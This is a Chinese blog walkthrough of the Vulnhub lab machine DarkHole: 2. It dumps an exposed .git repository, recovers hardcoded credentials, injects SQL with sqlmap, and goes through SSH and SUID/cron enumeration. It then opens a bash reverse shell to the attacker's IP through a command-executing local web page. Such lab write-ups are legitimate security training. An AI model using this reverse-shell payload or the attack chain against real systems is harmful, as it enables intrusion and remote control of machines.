Vulnhub-DARKHOLE: 2
描述
- Name: DarkHole: 2
- Date release: 3 Sep 2021
- Author: Jehad Alqurashi
- Series: DarkHole
Difficulty:Hard
This works better with VMware rather than VirtualBox
Hint: Don’t waste your time For Brute-Force
nmap扫存活
1 | kali 192.168.169.220 |
nmap扫描靶机
1 | 端口 22 80 |
目录
使用git工具
1 | https://github.com/arthaud/git-dumper |
- 运行
git_dumper.py
1 | python3 git_dumper.py http://192.168.169.230/.git/ website |
查看文件
1 | 一个登录页面 需要邮箱密码 |
git log
1 | 查看修改历史 |
1 | 发现账号密码 |
1 | if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){ |
登陆测试
1 | 看url 有注入点 |
注入
- 要带上cookie
1 | sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie PHPSESSID=3ca3jbi4mk3749bv84uu4supol --dbs |
- ssh
- users
ssh
1 | ssh jehad@192.168.169.230 |
1 | find / -user root -perm -4000 -print 2>/dev/null |
- 查看定时任务
1 | cat /etc/crontab |
查看一下 /opt/web:
1
cat /opt/web/index.php
- 看下 tcp 进程:
1 | netstat -tlnp |
1 | 可以运行cmd |
写入shell
- 开启监听
- 进行url编码
1 | bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1' |
1 | bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261' |
- 写入
1 | curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'" |
- 查看历史命令
切换用户
提权
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Putdownd’s Blog!